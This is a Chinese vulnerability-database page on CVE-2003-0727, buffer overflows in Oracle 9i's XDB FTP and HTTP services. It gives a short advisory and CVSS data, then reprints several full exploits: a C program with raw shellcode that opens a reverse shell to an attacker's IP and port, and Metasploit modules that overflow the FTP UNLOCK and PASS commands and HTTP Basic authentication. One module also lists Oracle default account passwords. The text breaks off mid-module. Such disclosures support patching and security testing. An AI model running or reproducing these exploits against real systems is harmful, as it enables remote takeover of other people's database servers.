CVE-2003-0727
CVSS2.1
发布时间 :2003-10-20 00:00:00
修订时间 :2008-09-10 15:20:19
NMCOEPS    

[原文]Multiple buffer overflows in the XML Database (XDB) functionality for Oracle 9i Database Release 2 allow local users to cause a denial of service or hijack user sessions.


[CNNVD]Oracle XDB FTP/HTTP服务多个缓冲区溢出漏洞(CNNVD-200310-071)

        
        Oracle XDB是Oracle 9i介绍的Oracle XML数据库,Oracle XDB数据可以通过基于HTTP服务的8080 TCP端口或者基于FTP服务的2100端口访问。
        XDB的HTTP和FTP服务存在多个缓冲区溢出问题,远程攻击者可以利用这些漏洞对服务进行拒绝服务攻击,精心提交字符串数据可能以服务进程权限在系统上执行任意指令。
        几个漏洞描述如下:
        -XDB HTTP超长用户名或密码问题:
        要使用基于WEB的XDB服务,用户必须进行验证,这通过使用Base64编码传递验证信息给服务器,但是攻击者提供超长的用户名或密码可导致堆栈溢出。
        -XDB FTP超长用户名或密码问题:
        通过提交超长用户名或密码给FTP XDB服务,可发生基于堆栈的缓冲区溢出。
        -XDB FTP test命令参数检查不充分问题:
        XDB FTP服务支持多数标准FTP命令,其中"test"命令对用户提交的参数缺少正确的边界缓冲区检查,攻击者提交包含超长命令的参数给FTP服务,可引起缓冲区溢出。
        -XDB FTP unlock命令参数检查不充分问题:
        FTP服务的UNLOCK命令对用户提交的参数缺少正确的缓冲区边界检查,攻击者提交包含超长命令的参数给FTP服务,可引起缓冲区溢出。
        

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0727
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-071
(官方数据源) CNNVD

- 其它链接及资源

http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf
(UNKNOWN)  CONFIRM  http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf

- 漏洞信息

Oracle XDB FTP/HTTP服务多个缓冲区溢出漏洞
低危 边界条件错误
2003-10-20 00:00:00 2006-10-06 00:00:00
远程※本地  
        
        Oracle XDB是Oracle 9i介绍的Oracle XML数据库,Oracle XDB数据可以通过基于HTTP服务的8080 TCP端口或者基于FTP服务的2100端口访问。
        XDB的HTTP和FTP服务存在多个缓冲区溢出问题,远程攻击者可以利用这些漏洞对服务进行拒绝服务攻击,精心提交字符串数据可能以服务进程权限在系统上执行任意指令。
        几个漏洞描述如下:
        -XDB HTTP超长用户名或密码问题:
        要使用基于WEB的XDB服务,用户必须进行验证,这通过使用Base64编码传递验证信息给服务器,但是攻击者提供超长的用户名或密码可导致堆栈溢出。
        -XDB FTP超长用户名或密码问题:
        通过提交超长用户名或密码给FTP XDB服务,可发生基于堆栈的缓冲区溢出。
        -XDB FTP test命令参数检查不充分问题:
        XDB FTP服务支持多数标准FTP命令,其中"test"命令对用户提交的参数缺少正确的边界缓冲区检查,攻击者提交包含超长命令的参数给FTP服务,可引起缓冲区溢出。
        -XDB FTP unlock命令参数检查不充分问题:
        FTP服务的UNLOCK命令对用户提交的参数缺少正确的缓冲区边界检查,攻击者提交包含超长命令的参数给FTP服务,可引起缓冲区溢出。
        

- 公告与补丁

        厂商补丁:
        Oracle
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://otn.oracle.com/deploy/security/pdf/2003Alert58.pdf

- 漏洞信息 (80)

Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit (EDBID:80)
windows remote
2003-08-13 Verified
2100 David Litchfield
N/A [点击下载]
/*  Oracle XDB FTP Service UNLOCK Buffer Overflow Exploit  */
/*    David Litchfield from ngssoftware (at Blackhat 2003)   */
/*                                                                                */
/*  Original Advisory :                                                     */
/*  http://www.blackhat.com/presentations/bh-usa-03/bh-  */
/*  us-03-litchfield-paper.pdf                                           */


#include <stdio.h> 
#include <windows.h> 
#include <winsock.h> 

int GainControlOfOracle(char *, char *); 
int StartWinsock(void); 
int SetUpExploit(char *,int); 

struct sockaddr_in s_sa; 
struct hostent *he; 
unsigned int addr; 
char host[260]="";

unsigned char exploit[508]= 
"\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF" 
"\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50" 
"\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C" 
"\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89" 
"\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13" 
"\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC" 
"\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C" 
"\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89" 
"\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83" 
"\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89" 
"\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33" 
"\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A" 
"\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66" 
"\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45" 
"\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0" 
"\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84" 
"\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57" 
"\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50" 
"\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8" 
"\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD" 
"\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03" 
"\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48" 
"\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83" 
"\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41" 
"\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03" 
"\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3" 
"\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C" 
"\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8" 
"\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B" 
"\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B" 
"\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF" 
"\xFF\xFF\xFF\xFF"; 

char exploit_code[8000]= 
"UNLOCK / aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnn" 
"nooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyyzzzzAAAAAABBBBCCCCD" 
"DDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS 
T" 
"TTTUUUUVVVVWWWWXXXXYYYYZZZZabcdefghijklmnopqrstuvwxyzABCDEFGHIJK" 
"LMNOPQRSTUVWXYZ0000999988887777666655554444333322221111098765432" 
"1aaaabbbbcc"; 


char exception_handler[8]="\x79\x9B\xf7\x77"; 
char short_jump[8]="\xEB\x06\x90\x90"; 


int main(int argc, char *argv[]) 
{ 
if(argc != 6) 
{ 
printf("\n\n\tOracle XDB FTP Service UNLOCK Buffer Overflow Exploit"); 
printf("\n\t\tfor Blackhat (http://www.blackhat.com)"); 
printf("\n\n\tSpawns a reverse shell to specified port"); 
printf("\n\n\tUsage:\t%s host userid password ipaddress port",argv[0]); 
printf("\n\n\tDavid Litchfield\n\t(david@ngssoftware.com)");
printf("\n\t6th July 2003\n\n\n"); 
return 0; 
} 
strncpy(host,argv[1],250); 
if(StartWinsock()==0) 
return printf("Error starting Winsock.\n"); 
SetUpExploit(argv[4],atoi(argv[5])); 
strcat(exploit_code,short_jump); 
strcat(exploit_code,exception_handler); 
strcat(exploit_code,exploit); 
strcat(exploit_code,"\r\n"); 


GainControlOfOracle(argv[2],argv[3]); 
return 0; 
} 


int SetUpExploit(char *myip, int myport) 
{ 
unsigned int ip=0; 
unsigned short prt=0; 
char *ipt=""; 
char *prtt=""; 


ip = inet_addr(myip); 
ipt = (char*)&ip; 
exploit[191]=ipt[0]; 
exploit[192]=ipt[1]; 
exploit[193]=ipt[2]; 
exploit[194]=ipt[3]; 
// set the TCP port to connect on 
// netcat should be listening on this port 
// e.g. nc -l -p 80 

prt = htons((unsigned short)myport); 
prt = prt ^ 0xFFFF; 
prtt = (char *) &prt; 
exploit[209]=prtt[0]; 
exploit[210]=prtt[1]; 
return 0; 
} 


int StartWinsock() { 
int err=0; WORD wVersionRequested; 
WSADATA wsaData; 
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData ); 
if ( err != 0 ) 
return 0; 

if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 ) 
{ WSACleanup( ); 
return 0; } 


if (isalpha(host[0])) { 
he = gethostbyname(host); 
s_sa.sin_addr.s_addr=INADDR_ANY; 
s_sa.sin_family=AF_INET; 
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length); 
} else 
{ addr = inet_addr(host); 
s_sa.sin_addr.s_addr=INADDR_ANY; 
s_sa.sin_family=AF_INET; 
memcpy(&s_sa.sin_addr,&addr,4); 
he = (struct hostent *)1; 
} 
if (he == NULL) { 
return 0; } 
return 1; } 


int GainControlOfOracle(char *user, char *pass) { 
char usercmd[260]="user "; 
char passcmd[260]="pass "; 
char resp[1600]=""; 
int snd=0,rcv=0; 
struct sockaddr_in r_addr; 
SOCKET sock; 


strncat(usercmd,user,230); 
strcat(usercmd,"\r\n"); 
strncat(passcmd,pass,230); 
strcat(passcmd,"\r\n"); 


sock=socket(AF_INET,SOCK_STREAM,0); 
if (sock==INVALID_SOCKET) 
return printf(" sock error"); 
r_addr.sin_family=AF_INET; r_addr.sin_addr.s_addr=INADDR_ANY; 
r_addr.sin_port=htons((unsigned short)0);

s_sa.sin_port=htons((unsigned short)2100); 
if (connect(sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR) return printf("Connect error"); 
rcv = recv(sock,resp,1500,0); 
printf("%s",resp); 
ZeroMemory(resp,1600); 
snd=send(sock, usercmd , strlen(usercmd) , 0); 
rcv = recv(sock,resp,1500,0); 
printf("%s",resp); ZeroMemory(resp,1600); 


snd=send(sock, passcmd , strlen(passcmd) , 0); 
rcv = recv(sock,resp,1500,0); 
printf("%s",resp); 
if(resp[0]=='5') 
{ closesocket(sock); 
return printf("Failed to log in using user %s and password %s.\n",user,pass); 
} 
ZeroMemory(resp,1600); 
snd=send(sock, exploit_code, strlen(exploit_code) , 0); 
Sleep(2000); 
closesocket(sock); 
return 0; 
}

// milw0rm.com [2003-08-13]
		

- 漏洞信息 (1365)

Oracle 9.2.0.1 Universal XDB HTTP Pass Overflow Exploit (EDBID:1365)
windows remote
2005-12-08 Verified
8080 y0
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::oracle9i_xdb_http;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {

	'Name'  => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
	'Version'  => '$Revision: 1.1 $',
	'Authors' => [ 'y0 [at] w00t-shell.net', ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
	'Priv'  => 0,
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 8080],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },
	  
	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	'Payload' =>
	  {
		'Space'     => 450,
		'BadChars'  => "\x00",
		'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a stack overflow in the authorization
		code of the Oracle 9i HTTP XDB service. David Litchfield, 
        has illustrated multiple vulnerabilities in the Oracle
        9i XML Database (XDB), during a seminar on "Variations
        in exploit methods between Linux and Windows" presented
        at the Blackhat conference. 
}),

	'Refs'  =>   [
		['BID', '8375'],
		['CVE', '2003-0727'],
		['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf']
	  ],

	'DefaultTarget' => 0,
	'Targets' => [

		['Oracle 9.2.0.1 Universal', 0x60616d46],

	  ],

	'Keys' => ['oracle'],

	'DisclosureDate' => 'Aug 18 2003',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my ($self) = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}

	$s->Send("GET / HTTP/1.0\r\n\r\n");
	my $res = $s->Recv(-1, 20);
	$s->Close();

	if ($res !~ /9\.2\.0\.1\.0/) {
		$self->PrintLine("[*] This server does not appear to be vulnerable.");
		return $self->CheckCode('Safe');
	}

	$self->PrintLine("[*] Vulnerable installation detected :-)");
	return $self->CheckCode('Detected');
}

sub Exploit
{
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $offset      = $self->GetVar('OFFSET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target = $self->Targets->[$target_idx];

	if (! $self->InitNops(128)) {
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}

	my $splat =
	  "meta:". Pex::Text::LowerCaseText(442). "\xeb\x64\x42\x42".
	  pack('V', $target->[1]). "wwwwoooottttsssshhhhllll".
	  $self->MakeNops(242). "\xeb\x10". $self->MakeNops(109). $shellcode;

	my $sploit =
	  "GET / HTTP/1.1". "\r\n".
	  "Host: $target_host:$target_port". "\r\n".
	  "User-Agent: Mozilla/5.0 (X11; U; Linux i686;".
	  "en-US; rv:1.7.12) Gecko/20050923". "\r\n".
	  "Accept: text/xml,application/xml,application".
	  "/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,".
	  "image/png,*/*;q=0.5". "\r\n".
	  "Accept-Language: en-us,en;q=0.5". "\r\n".
	  "Accept-Encoding: gzip,deflate". "\r\n".
	  "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7". "\r\n".
	  "Keep-Alive: 300". "\r\n".
	  "Connection: keep-alive". "\r\n".
	  "Authorization: Basic ". Pex::Text::Base64Encode($splat, '').
	  "\r\n\r\n";

	$self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$s->Send($sploit);
	$self->Handler($s);
	$s->Close();
	return;
}

1;


# milw0rm.com [2005-12-08]
		

- 漏洞信息 (16714)

Oracle 9i XDB FTP UNLOCK Overflow (win32) (EDBID:16714)
windows remote
2010-10-05 Verified
2100 metasploit
N/A [点击下载]
##
# $Id: oracle9i_xdb_ftp_unlock.rb 10559 2010-10-05 23:41:17Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
			'Description'    => %q{
					By passing an overly long token to the UNLOCK command, a
				stack based buffer overflow occurs. David Litchfield, has
				illustrated multiple vulnerabilities in the Oracle 9i XML
				Database (XDB), during a seminar on "Variations in exploit
				methods between Linux and Windows" presented at the Blackhat
				conference. Oracle9i includes a number of default accounts,
				including dbsnmp:dbsmp, scott:tiger, system:manager, and
				sys:change_on_install.
			},
			'Author'         => [ 'MC', 'David Litchfield <david@ngssoftware.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10559 $',
			'Platform'       => [ 'win' ],
			'References'     =>
				[
					[ 'CVE', '2003-0727'],
					[ 'OSVDB', '2449'],
					[ 'BID', '8375'],
					[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'Oracle 9.2.0.1 Universal',
						{
							'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret)
						},
					],
				],
			'DisclosureDate' => 'Aug 18 2003',
			'DefaultTarget' => 0))

		register_options([
			Opt::RPORT(2100),
			OptString.new('FTPUSER', [ false, 'The username to authenticate as', 'DBSNMP']),
			OptString.new('FTPPASS', [ false, 'The password to authenticate with', 'DBSNMP']),
		], self.class )
	end

	def check
		connect
		disconnect
		if (banner =~ /9\.2\.0\.1\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		print_status("Trying target #{target.name}...")

		buf = rand_text_english(1130, payload_badchars)
		seh = generate_seh_payload(target.ret)
		buf[322, seh.length] = seh

		send_cmd( ['UNLOCK', '/', buf] , false )

		handler
		disconnect
	end

end
		

- 漏洞信息 (16731)

Oracle 9i XDB FTP PASS Overflow (win32) (EDBID:16731)
win32 remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: oracle9i_xdb_ftp_pass.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 9i XDB FTP PASS Overflow (win32)',
			'Description'    => %q{
					By passing an overly long string to the PASS command, a
				stack based buffer overflow occurs. David Litchfield, has
				illustrated multiple vulnerabilities in the Oracle 9i XML
				Database (XDB), during a seminar on "Variations in exploit
				methods between Linux and Windows" presented at the Blackhat
				conference.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2003-0727'],
					[ 'OSVDB', '2449'],
					[ 'BID', '8375'],
					[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Targets'        =>
				[
					[
						'Oracle 9.2.0.1 Universal',
						{
									'Platform' => 'win',
									'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret)
						},
					],
				],
			'DisclosureDate' => 'Aug 18 2003',
			'DefaultTarget' => 0))

		register_options([Opt::RPORT(2100),], self.class)
		deregister_options('FTPUSER', 'FTPPASS')
	end


	def check
		connect
		disconnect
		if (banner =~ /9\.2\.0\.1\.0/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		user   = rand_text_alpha_upper(10)
		sploit =  rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6)
		sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded

		print_status("Trying target #{target.name}...")

		send_cmd( ['USER', user], true )
		send_cmd( ['PASS', sploit], false )

		handler
		disconnect
	end

end
		

- 漏洞信息 (16809)

Oracle 9i XDB HTTP PASS Overflow (win32) (EDBID:16809)
win32 remote
2010-09-20 Verified
8080 metasploit
N/A [点击下载]
##
# $Id: oracle9i_xdb_pass.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 9i XDB HTTP PASS Overflow (win32)',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the authorization
				code of the Oracle 9i HTTP XDB service. David Litchfield,
				has illustrated multiple vulnerabilities in the Oracle
				9i XML Database (XDB), during a seminar on "Variations
				in exploit methods between Linux and Windows" presented
				at the Blackhat conference.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2003-0727'],
					['OSVDB', '2449'],
					['BID', '8375'],
					['URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 9.2.0.1 Universal', { 'Ret' => 0x60616d46 } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Aug 18 2003'))

		register_options(
			[
				Opt::RPORT(8080)
			], self.class )
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect

		if (resp =~ /9.2.0.1.0/)
			return Exploit::CheckCode::Vulnerable
		end
			return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit =  rand_text_english(4, payload_badchars) + ":"
		sploit << rand_text_english(442, payload_badchars)
		sploit << "\xeb\x64" + make_nops(2) + [target.ret].pack('V')
		sploit << make_nops(266) + "\xeb\x10" + make_nops(109) + payload.encoded

		req  = "Authorization: Basic #{Rex::Text.encode_base64(sploit)}\r\n\r\n"

		res  = "GET / HTTP/1.1\r\n" + "Host: #{rhost}:#{rport}\r\n" + req

		print_status("Trying target %s..." % target.name)

		sock.put(res)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83144)

Oracle 9i XDB FTP PASS Overflow (win32) (PacketStormID:F83144)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,vulnerability
linux,windows
CVE-2003-0727
[点击下载]

By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	
	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Oracle 9i XDB FTP PASS Overflow (win32)',
			'Description'    => %q{
				By passing an overly long string to the PASS command, a
				stack based buffer overflow occurs. David Litchfield, has
				illustrated multiple vulnerabilities in the Oracle 9i XML
				Database (XDB), during a seminar on "Variations in exploit
				methods between Linux and Windows" presented at the Blackhat
				conference.
					
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0727'],
					[ 'OSVDB', '2449'],
					[ 'BID', '8375'],
					[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",	
				},
			'Targets'        =>
				[
					[
						'Oracle 9.2.0.1 Universal',
						{
									'Platform' => 'win',
									'Ret'      => 0x60616d46, # oraclient9.dll (pop/pop/ret)
						},
					],
				],
			'DisclosureDate' => 'Aug 18 2003',
			'DefaultTarget' => 0))

			register_options([Opt::RPORT(2100),], self.class)
			deregister_options('FTPUSER', 'FTPPASS')

	end

	
	def check
		connect
		disconnect	
		if (banner =~ /9\.2\.0\.1\.0/)
			return Exploit::CheckCode::Vulnerable
		end		
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		user   = rand_text_alpha_upper(10)
		sploit =  rand_text_alpha_upper(442) + Rex::Arch::X86.jmp_short(6) 
		sploit << make_nops(2) + [target.ret].pack('V') + payload.encoded
	
		print_status("Trying target #{target.name}...")	
	
		send_cmd( ['USER', user], true )
		send_cmd( ['PASS', sploit], false )
		
		handler
		disconnect
	end

end
    

- 漏洞信息 (F82958)

Oracle 9i XDB FTP UNLOCK Overflow (win32) (PacketStormID:F82958)
2009-11-26 00:00:00
David Litchfield,MC  metasploit.com
exploit,overflow
CVE-2003-0727
[点击下载]

By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Ftp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Oracle 9i XDB FTP UNLOCK Overflow (win32)',
			'Description'    => %q{
				By passing an overly long token to the UNLOCK command, a
				stack based buffer overflow occurs. David Litchfield, has
				illustrated multiple vulnerabilities in the Oracle 9i XML
				Database (XDB), during a seminar on "Variations in exploit
				methods between Linux and Windows" presented at the Blackhat
				conference. Oracle9i includes a number of default accounts,
				including dbsnmp:dbsmp, scott:tiger, system:manager, and
				sys:change_on_install.
					
			},
			'Author'         => [ 'MC', 'David Litchfield <david@ngssoftware.com>' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0727'],
					[ 'OSVDB', '2449'],
					[ 'BID', '8375'],
					[ 'URL', 'http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},	
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x20\x0a\x0d",
					'StackAdjustment' => -3500,

				},
			'Targets'        => 
				[
					[ 
